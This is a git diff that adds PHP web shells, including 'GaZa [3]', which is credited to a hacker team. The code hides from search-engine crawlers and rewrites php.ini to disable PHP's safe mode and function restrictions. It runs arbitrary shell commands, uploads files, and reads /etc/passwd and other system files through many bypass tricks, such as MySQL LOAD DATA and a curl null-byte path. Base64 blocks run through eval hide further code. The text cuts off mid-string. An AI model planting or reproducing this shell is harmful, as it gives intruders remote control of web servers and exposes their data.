+"AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMg" .
+"ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAAkACwAAAAAFA" .
+"AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D+VHAFZiWmmZ8BGH" .
+"ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnkup/gMq1mdamC1tdn" .
+"36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7",
+"sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
+"9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAACACwAAAAAFAAW" .
+"AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE4ZnF6hCqn0iryKs" .
+"0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnY***QLhBiJigsJADs=",
+"script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
+"9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
+"AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYVM0dNS/AF7gGy1me" .
+"16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs=");
+header('Content-type: image/gif');
+echo base64_decode($images[$img]);
+die();
+}
+
+function kill(){ // Shell deleter function
+style();
+echo("<form method='post'>");
+echo("Type 'confirm' to kill the shell:<br>\n<input type='text' name='ver' action='?act=kill'>");
+echo("<input type='submit' value='Delete'>");
+echo("</form>");
+if($_POST['ver'] == "confirm"){
+$self = basename($_SERVER['PHP_SELF']);
+if(unlink($self)){echo("Deleted");}
+else{echo("Failed");}
+}
+}
+die();
+?> 
diff --git a/php/g3.php b/php/g3.php
new file mode 100644
index 0000000..ec92b57
--- /dev/null
+++ b/php/g3.php
@@ -0,0 +1,1592 @@
+<?
+if(!empty($_SERVER['HTTP_USER_AGENT'])) {
+    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
+    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
+        header('HTTP/1.0 404 Not Found');
+        exit;
+    }
+}
+error_reporting(0); 
+$function_tkl = $_POST['function_tkl'];
+$pwd = $_POST['pwd'];
+$dir = $_POST['dir'];
+if ($dir == ''){
+$dir = getcwd();
+}
+if ($gaza == 'ini'){
+$fp = fopen("php.ini","w+");
+fwrite($fp,"safe_mode = Off
+disable_functions  =    NONE
+open_basedir = OFF ");
+}
+if (!empty ($_FILES['gazaUP']))
+{
+    move_uploaded_file($_FILES['gazaUP']['tmp_name'],$dir.'/'.$_FILES['gazaUP']['name']);
+    $gaza_text = "<b>Uploaded Successfully</b><br>file name : ".$_FILES['gazaUP']['name']."<br>file size : ".$_FILES['gazaUP']['size']."<br>file type : ".$_FILES['gazaUP']['type']."<br>";
+}
+if ($function_tkl == 'mysql'){
+ $gaza_text1 = "<form method='POST' align='center'>
+<br>
+ :::Please enter your Database information:::
+ <br>Host Name:<input type='text' name='host_name' value='localhost' ><br>
+User Name :<input type='text' name='user_name' ><br>
+User Pass :<input type='text' name='user_pass'  ><br>
+Database Name :<input type='text' name='db_name' ><br>
+File to Read :<input type='text' name='gaza_mysql_file' value='/etc/passwd'><br>
+<input type='hidden' name='function_tkl' value='mysql1' ><br>
+<input type='submit' value='Read' ><br>
+</form>
+"; 
+}
+if ($function_tkl == 'mysql1'){
+
+$host_name = $_POST['host_name']; // e.g : localhost
+$user_name = $_POST['user_name']; // e.g : gaza_hacker
+$user_pass = $_POST['user_pass']; // e.g : 123456
+$db_name = $_POST['db_name']; // e.g : tkl_3654654
+$gaza_mysql_file = $_POST['gaza_mysql_file']; // e.g : /etc/passwd
+$mysql_use = "yes";
+$inquiry = array (
+"USE $db_name",
+'CREATE TEMPORARY TABLE ' . ($tkl_table = 'A'.time ()) . ' (a LONGBLOB)',
+"LOAD DATA LOCAL INFILE '$gaza_mysql_file' INTO TABLE $tkl_table FIELDS "
+. "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
+. "ESCAPED BY          '' "
+. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
+
+"SELECT a FROM $tkl_table LIMIT 1"
+);
+mysql_connect ($host_name, $user_name, $user_pass);
+
+foreach ($inquiry as $inquiry_info) {
+ $quiry = mysql_query ($inquiry_info);
+if ($quiry == false) die (
+"error: " . $inquiry_info . "\n" .
+"error info: " . mysql_error () . "\n"
+ );
+if (! $tkl_read = @mysql_fetch_array ($quiry, MYSQL_NUM)) continue;
+$gaza_file = htmlspecialchars($tkl_read[0]);
+  mysql_free_result ($quiry);
+}
+}
+function readFileTKL ($function_tkl,$pwd) {
+
+switch($function_tkl){
+case "show_source":
+htmlspecialchars(show_source($pwd));
+break;
+case "readfile":
+htmlspecialchars(readfile($pwd));
+break;
+case "include":
+htmlspecialchars(include $pwd);
+break;
+case "fpassthru":
+$fp = fopen($pwd, 'r');
+htmlspecialchars(fpassthru($fp));
+break;
+case "file":
+$output = file($pwd);
+foreach( $output as $line )
+{
+    echo htmlspecialchars($line . "\n");
+}
+break;
+case "highlight_file":
+htmlspecialchars(highlight_file($pwd));
+break;
+case "curl":
+$tkl_cu =
+curl_init("file:///".$pwd."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($tkl_cu);
+htmlspecialchars(var_dump(curl_exec($tkl_cu)));
+break;
+case "posix_getpwuid":
+for($uid=0;$uid<2000;$uid++){
+$gaza_ar = posix_getpwuid($uid);
+if (!empty($gaza_ar)) {
+while (list ($key, $val) = each($gaza_ar)){
+print "$val:";
+ }
+ print "\n";
+ }
+}
+break;
+case "copy":
+$tmp=tempnam($ooopo, "cx");
+if(copy("compress.zlib://".$pwd, $tmp)){
+$ioio = fopen($tmp, "r");
+echo fread($ioio, filesize($tmp));
+fclose($ioio);
+unlink($tmp);
+};
+break;
+case "fgets":
+$handle = @fopen($pwd, "r");
+if ($handle) {
+    while (($buffer = fgets($handle, 4096)) !== false) {
+        echo  $gaza_file.$buffer;
+    }
+    fclose($handle);
+}
+break;
+case "file_get_contents":
+echo file_get_contents($pwd);
+
+break;
+case "fread":
+$handle = fopen($pwd, "r");
+echo  fread($handle, filesize($pwd));
+fclose($handle);
+break;
+case "stream_get_contents":
+if ($stream = fopen($pwd, 'r')) {
+     echo  stream_get_contents($stream, -1, 10);
+    fclose($stream);
+}
+break;
+}
+}
+function exTKL() {
+	$in=$_POST['command'];
+	if (!$in == '') {
+	$out = '';
+	if (function_exists('exec')) {
+		@exec($in,$out);
+		$out = @join("\n",$out);
+	} elseif (function_exists('passthru')) {
+		ob_start();
+		@passthru($in);
+		$out = ob_get_clean();
+	} elseif (function_exists('system')) {
+		ob_start();
+		@system($in);
+		$out = ob_get_clean();
+	} elseif (function_exists('shell_exec')) {
+		$out = shell_exec($in);
+	} elseif (is_resource($f = @popen($in,"r"))) {
+		$out = "";
+		while(!@feof($f))
+			$out .= fread($f,1024);
+		pclose($f);
+	}
+	echo $out;
+	}
+}
+function hidTKL () {
+echo "
+<html>
+<head>
+<title>GaZa [3] ~!!</title>
+<meta http-equiv='Content-Type' content='text/html; charset=windows-1256' />
+<style>
+body { background-color:#000000; color:#25ff00; font-family:Verdana; font-size:11px; }
+h1,h3 { color:white; font-family:Verdana; font-size:11px; }
+input,textarea,select,button { color: rgb(0, 190, 0); background-color:#444; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }
+textarea { font-family:Courier; }
+a { color:rgb(0, 190, 0); text-decoration:none; font-family:Verdana; font-size:11px; }
+a:hover { color:rgb(0, 250, 0); }
+td { font-size:12px; vertical-align:middle; }
+th { font-size:13px; vertical-align:middle; }
+table { empty-cells:show; }
+.inf { color:#7F7F7F; }
+</style>
+<!--
+###################################################################
+#        :'######::::::'###::::'########::::'###::::              #
+#        '##... ##::::'## ##:::..... ##::::'## ##:::              #
+#         ##:::..::::'##:. ##:::::: ##::::'##:. ##::              #
+#         ##::'####:'##:::. ##:::: ##::::'##:::. ##:              #
+#         ##::: ##:: #########::: ##::::: #########:              #
+#         ##::: ##:: ##.... ##:: ##:::::: ##.... ##:              #
+#        . ######::: ##:::: ##: ########: ##:::: ##:              #
+#        :......::::..:::::..::........::..:::::..::              #
+#  '##::::'##::::'###:::::'######::'##:::'##:'########:'########::#
+#   ##:::: ##:::'## ##:::'##... ##: ##::'##:: ##.....:: ##.... ##:#
+#   ##:::: ##::'##:. ##:: ##:::..:: ##:'##::: ##::::::: ##:::: ##:#
+#   #########:'##:::. ##: ##::::::: #####:::: ######::: ########::#
+#   ##.... ##: #########: ##::::::: ##. ##::: ##...:::: ##.. ##:::#
+#   ##:::: ##: ##.... ##: ##::: ##: ##:. ##:: ##::::::: ##::. ##::#
+#   ##:::: ##: ##:::: ##:. ######:: ##::. ##: ########: ##:::. ##:#
+#  ..:::::..::..:::::..:::......:::..::::..::........::..:::::..::#
+#        '########:'########::::'###::::'##::::'##:               #
+#        ... ##..:: ##.....::::'## ##::: ###::'###:               #
+#        ::: ##:::: ##::::::::'##:. ##:: ####'####:               #
+#        ::: ##:::: ######:::'##:::. ##: ## ### ##:               #
+#        ::: ##:::: ##...:::: #########: ##. #: ##:               #
+#        ::: ##:::: ##::::::: ##.... ##: ##:.:: ##:               #
+#        ::: ##:::: ########: ##:::: ##: ##:::: ##:               #
+#        :::..:::::........::..:::::..::..:::::..::               #
+#                 WwW.Gaza-Hacker.NeT                             #
+#                       GaZa [3]                                  #
+#                    Coded By TKL                                 #
+###################################################################
+-->
+
+</head>
+<body>
+<hr>
+<form method='GET'>
+<input type='submit' value='Home' size='10' >
+<input type='submit' name='tool' value='Files' size='10' >
+<input type='submit' name='tool' value='Bruteforce' size='10' >
+<input type='submit' name='tool' value='bypass' size='10' >
+<input type='submit' name='tool' value='SQL' size='10' >
+<input type='submit' name='tool' value='symlink' size='10' >
+<input type='submit' name='tool' value='Change-Admin' size='10' >
+<input type='submit' name='tool' value='vBulletin-Tool' size='10' >
+<input type='submit' name='tool' value='Server-Info' size='10' >
+<input type='submit' name='tool' value='About' size='10' >
+</form>
+<hr>";
+}
+function fotTKL($gaza_text,$gaza_text1,$dir) {
+echo "</textarea>
+		</td>
+</tr>
+<tr>
+<td>
+<left>
+<form method='POST'>
+<input type='text' name='dir' value= '".$dir."' size='30' >
+<input type='submit' value='>>' size='10' >
+</form>
+</left>
+</td>
+	<form method='POST'>			<p>
+			<input type='text' name='command' />
+			<input type='submit' value='Execute' />
+		
+			</p>
+		</form>
+		
+<td align='right'  >
+		<form method='POST'>			<p>
+			<input type='text' name='pwd' value='/etc/passwd' />
+			<select name='function_tkl'>
+				<option value='curl'>curl</option>
+				<option value='show_source'>show source</option>
+				<option value='stream_get_contents'>stream get contents</option>
+				<option value='readfile'>readfile</option>
+				<option value='include'>include</option>
+				<option value='fpassthru'>fpassthru</option>
+				<option value='fread'>fread</option>
+				<option value='file_get_contents'>file get contents</option>
+				<option value='file'>file</option>
+				<option value='fgets'>fgets</option>
+				<option value='copy'>copy</option>
+				<option value='highlight_file'>highlight file</option>
+				<option value='posix_getpwuid'>posix_getpwuid</option>
+				<option value='mysql'>MYsql</option>
+				</select>
+			<input type='submit' value='Read' />
+			</p>
+		</form>
+</td>
+</tr>
+</table>
+<hr>
+<left>
+<form method='POST' enctype='multipart/form-data'>
+<input type='file' name='gazaUP' size='23' >
+<input type='text' name='dir' value='".$dir."' >
+<input type='submit' value='Upload' size='35' >
+</form>
+</left>
+<table width='100%'>
+<tr>
+<td width='50%'>
+".$gaza_text."
+</td>
+<td   width='50%' >
+".$gaza_text1."
+</td>
+</tr>
+</table>
+</body>
+</html>";
+}
+function toolTKL () {
+$tkl_tool = $_GET['tool'];
+switch($tkl_tool){
+case "About":
+$tkl = "ZWNobyAiR2FaYSBTaGVsbCBWIDMgPGJyIC8+PGEgaHJlZj0naHR0cDovL2dhemEtaGFja2VyLm5ldCcgdGFyZ2V0PSdfYmxhbmsnPkdhemEgSGFDS2VSIFRlYW08L2E+PGJyIC8+IERldmVsb3BlZCBieSA8YSBocmVmPSdodHRwOi8vd3d3LmZhY2Vib29rLmNvbS9kci50a2wnIHRhcmdldD0nX2JsYW5rJz5US0w8L2E+IjsK";
+eval(base64_decode($tkl));
+exit;
+case "SQL":
+$tkl = "ZWNobyAiPHNjcmlwdD4gICAgIHZhciBwMV8gPSAnIiAuICgoc3RycG9zKEAkX1BPU1RbJ3AxJ10sIlxuIikhPT1mYWxzZSk/Jyc6aHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ3AxJ10sRU5UX1FVT1RFUykpIC4iJzsgICAgIHZhciBwMl8gPSAnIiAuICgoc3RycG9zKEAkX1BPU1RbJ3AyJ10sIlxuIikhPT1mYWxzZSk/Jyc6aHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ3AyJ10sRU5UX1FVT1RFUykpIC4iJzsgICAgIHZhciBwM18gPSAnIiAuICgoc3RycG9zKEAkX1BPU1RbJ3AzJ10sIlxuIikhPT1mYWxzZSk/Jyc6aHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ3AzJ10sRU5UX1FVT1RFUykpIC4iJzsgICAgIHZhciBkID0gZG9jdW1lbnQ7IAlmdW5jdGlvbiBzZXQoYSxjLHAxLHAyLHAzLGNoYXJzZXQpIHsgCQlpZihhIT1udWxsKWQubWYuYS52YWx1ZT1hO2Vsc2UgZC5tZi5hLnZhbHVlPWFfOyAJCWlmKGMhPW51bGwpZC5tZi5jLnZhbHVlPWM7ZWxzZSBkLm1mLmMudmFsdWU9Y187IAkJaWYocDEhPW51bGwpZC5tZi5wMS52YWx1ZT1wMTtlbHNlIGQubWYucDEudmFsdWU9cDFfOyAJCWlmKHAyIT1udWxsKWQubWYucDIudmFsdWU9cDI7ZWxzZSBkLm1mLnAyLnZhbHVlPXAyXzsgCQlpZihwMyE9bnVsbClkLm1mLnAzLnZhbHVlPXAzO2Vsc2UgZC5tZi5wMy52YWx1ZT1wM187IAkJaWYoY2hhcnNldCE9bnVsbClkLm1mLmNoYXJzZXQudmFsdWU9Y2hhcnNldDtlbHNlIGQubWYuY2hhcnNldC52YWx1ZT1jaGFyc2V0XzsgCX0gCWZ1bmN0aW9uIGcoYSxjLHAxLHAyLHAzLGNoYXJzZXQpIHsgCQlzZXQoYSxjLHAxLHAyLHAzLGNoYXJzZXQpOyAJCWQubWYuc3VibWl0KCk7IAl9ICA8L3NjcmlwdD4iOyAJY2xhc3MgRGJDbGFzcyB7IAkJdmFyICR0eXBlOyAJCXZhciAkbGluazsgCQl2YXIgJHJlczsgCQlmdW5jdGlvbiBEYkNsYXNzKCR0eXBlKQl7IAkJCSR0aGlzLT50eXBlID0gJHR5cGU7IAkJfSAJCWZ1bmN0aW9uIGNvbm5lY3QoJGhvc3QsICR1c2VyLCAkcGFzcywgJGRibmFtZSl7IAkJCXN3aXRjaCgkdGhpcy0+dHlwZSkJeyAJCQkJY2FzZSAnbXlzcWwnOiAJCQkJCWlmKCAkdGhpcy0+bGluayA9IEBteXNxbF9jb25uZWN0KCRob3N0LCR1c2VyLCRwYXNzLHRydWUpICkgcmV0dXJuIHRydWU7IAkJCQkJYnJlYWs7IAkJCQljYXNlICdwZ3NxbCc6IAkJCQkJJGhvc3QgPSBleHBsb2RlKCc6JywgJGhvc3QpOyAJCQkJCWlmKCEkaG9zdFsxXSkgJGhvc3RbMV09NTQzMjsgCQkJCQlpZiggJHRoaXMtPmxpbmsgPSBAcGdfY29ubmVjdCgiaG9zdD17JGhvc3RbMF19IHBvcnQ9eyRob3N0WzFdfSB1c2VyPSR1c2VyIHBhc3N3b3JkPSRwYXNzIGRibmFtZT0kZGJuYW1lIikgKSByZXR1cm4gdHJ1ZTsgCQkJCQlicmVhazsgCQkJfSAJCQlyZXR1cm4gZmFsc2U7IAkJfSAJCWZ1bmN0aW9uIHNlbGVjdGRiKCRkYikgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlpZiAoQG15c3FsX3NlbGVjdF9kYigkZGIpKXJldHVybiB0cnVlOyAJCQkJCWJyZWFrOyAJCQl9IAkJCXJldHVybiBmYWxzZTsgCQl9IAkJZnVuY3Rpb24gcXVlcnkoJHN0cikgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpIHsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlyZXR1cm4gJHRoaXMtPnJlcyA9IEBteXNxbF9xdWVyeSgkc3RyKTsgCQkJCQlicmVhazsgCQkJCWNhc2UgJ3Bnc3FsJzogCQkJCQlyZXR1cm4gJHRoaXMtPnJlcyA9IEBwZ19xdWVyeSgkdGhpcy0+bGluaywkc3RyKTsgCQkJCQlicmVhazsgCQkJfSAJCQlyZXR1cm4gZmFsc2U7IAkJfSAJCWZ1bmN0aW9uIGZldGNoKCkgeyAJCQkkcmVzID0gZnVuY19udW1fYXJncygpP2Z1bmNfZ2V0X2FyZygwKTokdGhpcy0+cmVzOyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlyZXR1cm4gQG15c3FsX2ZldGNoX2Fzc29jKCRyZXMpOyAJCQkJCWJyZWFrOyAJCQkJY2FzZSAncGdzcWwnOiAJCQkJCXJldHVybiBAcGdfZmV0Y2hfYXNzb2MoJHJlcyk7IAkJCQkJYnJlYWs7IAkJCX0gCQkJcmV0dXJuIGZhbHNlOyAJCX0gCQlmdW5jdGlvbiBsaXN0RGJzKCkgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuICR0aGlzLT5xdWVyeSgiU0hPVyBkYXRhYmFzZXMiKTsgCQkJCWJyZWFrOyAJCQkJY2FzZSAncGdzcWwnOiAJCQkJCXJldHVybiAkdGhpcy0+cmVzID0gJHRoaXMtPnF1ZXJ5KCJTRUxFQ1QgZGF0bmFtZSBGUk9NIHBnX2RhdGFiYXNlIFdIRVJFIGRhdGlzdGVtcGxhdGUhPSd0JyIpOyAJCQkJYnJlYWs7IAkJCX0gCQkJcmV0dXJuIGZhbHNlOyAJCX0gCQlmdW5jdGlvbiBsaXN0VGFibGVzKCkgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlyZXR1cm4gJHRoaXMtPnJlcyA9ICR0aGlzLT5xdWVyeSgnU0hPVyBUQUJMRVMnKTsgCQkJCWJyZWFrOyAJCQkJY2FzZSAncGdzcWwnOiAJCQkJCXJldHVybiAkdGhpcy0+cmVzID0gJHRoaXMtPnF1ZXJ5KCJzZWxlY3QgdGFibGVfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hICE9ICdpbmZvcm1hdGlvbl9zY2hlbWEnIEFORCB0YWJsZV9zY2hlbWEgIT0gJ3BnX2NhdGFsb2cnIik7IAkJCQlicmVhazsgCQkJfSAJCQlyZXR1cm4gZmFsc2U7IAkJfSAJCWZ1bmN0aW9uIGVycm9yKCkgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlyZXR1cm4gQG15c3FsX2Vycm9yKCk7IAkJCQlicmVhazsgCQkJCWNhc2UgJ3Bnc3FsJzogCQkJCQlyZXR1cm4gQHBnX2xhc3RfZXJyb3IoKTsgCQkJCWJyZWFrOyAJCQl9IAkJCXJldHVybiBmYWxzZTsgCQl9IAkJZnVuY3Rpb24gc2V0Q2hhcnNldCgkc3RyKSB7IAkJCXN3aXRjaCgkdGhpcy0+dHlwZSkJeyAJCQkJY2FzZSAnbXlzcWwnOiAJCQkJCWlmKGZ1bmN0aW9uX2V4aXN0cygnbXlzcWxfc2V0X2NoYXJzZXQnKSkgCQkJCQkJcmV0dXJuIEBteXNxbF9zZXRfY2hhcnNldCgkc3RyLCAkdGhpcy0+bGluayk7IAkJCQkJZWxzZSAJCQkJCQkkdGhpcy0+cXVlcnkoJ1NFVCBDSEFSU0VUICcuJHN0cik7IAkJCQkJYnJlYWs7IAkJCQljYXNlICdwZ3NxbCc6IAkJCQkJcmV0dXJuIEBwZ19zZXRfY2xpZW50X2VuY29kaW5nKCR0aGlzLT5saW5rLCAkc3RyKTsgCQkJCQlicmVhazsgCQkJfSAJCQlyZXR1cm4gZmFsc2U7IAkJfSAJCWZ1bmN0aW9uIGxvYWRGaWxlKCRzdHIpIHsgCQkJc3dpdGNoKCR0aGlzLT50eXBlKQl7IAkJCQljYXNlICdteXNxbCc6IAkJCQkJcmV0dXJuICR0aGlzLT5mZXRjaCgkdGhpcy0+cXVlcnkoIlNFTEVDVCBMT0FEX0ZJTEUoJyIuYWRkc2xhc2hlcygkc3RyKS4iJykgYXMgZmlsZSIpKTsgCQkJCWJyZWFrOyAJCQkJY2FzZSAncGdzcWwnOiAJCQkJCSR0aGlzLT5xdWVyeSgiQ1JFQVRFIFRBQkxFIHdzbzIoZmlsZSB0ZXh0KTtDT1BZIHdzbzIgRlJPTSAnIi5hZGRzbGFzaGVzKCRzdHIpLiInO3NlbGVjdCBmaWxlIGZyb20gd3NvMjsiKTsgCQkJCQkkcj1hcnJheSgpOyAJCQkJCXdoaWxlKCRpPSR0aGlzLT5mZXRjaCgpKSAJCQkJCQkkcltdID0gJGlbJ2ZpbGUnXTsgCQkJCQkkdGhpcy0+cXVlcnkoJ2Ryb3AgdGFibGUgd3NvMicpOyAJCQkJCXJldHVybiBhcnJheSgnZmlsZSc9PmltcGxvZGUoIlxuIiwkcikpOyAJCQkJYnJlYWs7IAkJCX0gCQkJcmV0dXJuIGZhbHNlOyAJCX0gCQlmdW5jdGlvbiBkdW1wKCR0YWJsZSwgJGZwID0gZmFsc2UpIHsgCQkJc3dpdGNoKCR0aGlzLT50eXBlKQl7IAkJCQljYXNlICdteXNxbCc6IAkJCQkJJHJlcyA9ICR0aGlzLT5xdWVyeSgnU0hPVyBDUkVBVEUgVEFCTEUgYCcuJHRhYmxlLidgJyk7IAkJCQkJJGNyZWF0ZSA9IG15c3FsX2ZldGNoX2FycmF5KCRyZXMpOyAJCQkJCSRzcWwgPSAkY3JlYXRlWzFdLiI7XG4iOyAgICAgICAgICAgICAgICAgICAgIGlmKCRmcCkgZndyaXRlKCRmcCwgJHNxbCk7IGVsc2UgZWNobygkc3FsKTsgCQkJCQkkdGhpcy0+cXVlcnkoJ1NFTEVDVCAqIEZST00gYCcuJHRhYmxlLidgJyk7ICAgICAgICAgICAgICAgICAgICAgJGhlYWQgPSB0cnVlOyAJCQkJCXdoaWxlKCRpdGVtID0gJHRoaXMtPmZldGNoKCkpIHsgCQkJCQkJJGNvbHVtbnMgPSBhcnJheSgpOyAJCQkJCQlmb3JlYWNoKCRpdGVtIGFzICRrPT4kdikgeyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYoJHYgPT0gbnVsbCkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaXRlbVska10gPSAiTlVMTCI7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlbHNlaWYoaXNfbnVtZXJpYygkdikpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGl0ZW1bJGtdID0gJHY7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlbHNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGl0ZW1bJGtdID0gIiciLkBteXNxbF9yZWFsX2VzY2FwZV9zdHJpbmcoJHYpLiInIjsgCQkJCQkJCSRjb2x1bW5zW10gPSAiYCIuJGsuImAiOyAJCQkJCQl9ICAgICAgICAgICAgICAgICAgICAgICAgIGlmKCRoZWFkKSB7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkc3FsID0gJ0lOU0VSVCBJTlRPIGAnLiR0YWJsZS4nYCAoJy5pbXBsb2RlKCIsICIsICRjb2x1bW5zKS4iKSBWQUxVRVMgXG5cdCgiLmltcGxvZGUoIiwgIiwgJGl0ZW0pLicpJzsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoZWFkID0gZmFsc2U7ICAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHNxbCA9ICJcblx0LCgiLmltcGxvZGUoIiwgIiwgJGl0ZW0pLicpJzsgICAgICAgICAgICAgICAgICAgICAgICAgaWYoJGZwKSBmd3JpdGUoJGZwLCAkc3FsKTsgZWxzZSBlY2hvKCRzcWwpOyAJCQkJCX0gICAgICAgICAgICAgICAgICAgICBpZighJGhlYWQpICAgICAgICAgICAgICAgICAgICAgICAgIGlmKCRmcCkgZndyaXRlKCRmcCwgIjtcblxuIik7IGVsc2UgZWNobygiO1xuXG4iKTsgCQkJCWJyZWFrOyAJCQkJY2FzZSAncGdzcWwnOiAJCQkJCSR0aGlzLT5xdWVyeSgnU0VMRUNUICogRlJPTSAnLiR0YWJsZSk7IAkJCQkJd2hpbGUoJGl0ZW0gPSAkdGhpcy0+ZmV0Y2goKSkgeyAJCQkJCQkkY29sdW1ucyA9IGFycmF5KCk7IAkJCQkJCWZvcmVhY2goJGl0ZW0gYXMgJGs9PiR2KSB7IAkJCQkJCQkkaXRlbVska10gPSAiJyIuYWRkc2xhc2hlcygkdikuIiciOyAJCQkJCQkJJGNvbHVtbnNbXSA9ICRrOyAJCQkJCQl9ICAgICAgICAgICAgICAgICAgICAgICAgICRzcWwgPSAnSU5TRVJUIElOVE8gJy4kdGFibGUuJyAoJy5pbXBsb2RlKCIsICIsICRjb2x1bW5zKS4nKSBWQUxVRVMgKCcuaW1wbG9kZSgiLCAiLCAkaXRlbSkuJyk7Jy4iXG4iOyAgICAgICAgICAgICAgICAgICAgICAgICBpZigkZnApIGZ3cml0ZSgkZnAsICRzcWwpOyBlbHNlIGVjaG8oJHNxbCk7IAkJCQkJfSAJCQkJYnJlYWs7IAkJCX0gCQkJcmV0dXJuIGZhbHNlOyAJCX0gCX07IAkkZGIgPSBuZXcgRGJDbGFzcygkX1BPU1RbJ3R5cGUnXSk7IAlpZihAJF9QT1NUWydwMiddPT0nZG93bmxvYWQnKSB7IAkJJGRiLT5jb25uZWN0KCRfUE9TVFsnc3FsX2hvc3QnXSwgJF9QT1NUWydzcWxfbG9naW4nXSwgJF9QT1NUWydzcWxfcGFzcyddLCAkX1BPU1RbJ3NxbF9iYXNlJ10pOyAJCSRkYi0+c2VsZWN0ZGIoJF9QT1NUWydzcWxfYmFzZSddKTsgICAgICAgICBzd2l0Y2goJF9QT1NUWydjaGFyc2V0J10pIHsgICAgICAgICAgICAgY2FzZSAiV2luZG93cy0xMjUxIjogJGRiLT5zZXRDaGFyc2V0KCdjcDEyNTEnKTsgYnJlYWs7ICAgICAgICAgICAgIGNhc2UgIlVURi04IjogJGRiLT5zZXRDaGFyc2V0KCd1dGY4Jyk7IGJyZWFrOyAgICAgICAgICAgICBjYXNlICJLT0k4LVIiOiAkZGItPnNldENoYXJzZXQoJ2tvaThyJyk7IGJyZWFrOyAgICAgICAgICAgICBjYXNlICJLT0k4LVUiOiAkZGItPnNldENoYXJzZXQoJ2tvaTh1Jyk7IGJyZWFrOyAgICAgICAgICAgICBjYXNlICJjcDg2NiI6ICRkYi0+c2V0Q2hhcnNldCgnY3A4NjYnKTsgYnJlYWs7ICAgICAgICAgfSAgICAgICAgIGlmKGVtcHR5KCRfUE9TVFsnZmlsZSddKSkgeyAgICAgICAgICAgICBvYl9zdGFydCgib2JfZ3poYW5kbGVyIiwgNDA5Nik7ICAgICAgICAgICAgIGhlYWRlcigiQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9ZHVtcC5zcWwiKTsgICAgICAgICAgICAgaGVhZGVyKCJDb250ZW50LVR5cGU6IHRleHQvcGxhaW4iKTsgICAgICAgICAgICAgZm9yZWFjaCgkX1BPU1RbJ3RibCddIGFzICR2KSAJCQkJJGRiLT5kdW1wKCR2KTsgICAgICAgICAgICAgZXhpdDsgICAgICAgICB9IGVsc2VpZigkZnAgPSBAZm9wZW4oJF9QT1NUWydmaWxlJ10sICd3JykpIHsgICAgICAgICAgICAgZm9yZWFjaCgkX1BPU1RbJ3RibCddIGFzICR2KSAgICAgICAgICAgICAgICAgJGRiLT5kdW1wKCR2LCAkZnApOyAgICAgICAgICAgICBmY2xvc2UoJGZwKTsgICAgICAgICAgICAgdW5zZXQoJF9QT1NUWydwMiddKTsgICAgICAgICB9IGVsc2UgICAgICAgICAgICAgZGllKCc8c2NyaXB0PmFsZXJ0KCJFcnJvciEgQ2FuXCd0IG9wZW4gZmlsZSIpO3dpbmRvdy5oaXN0b3J5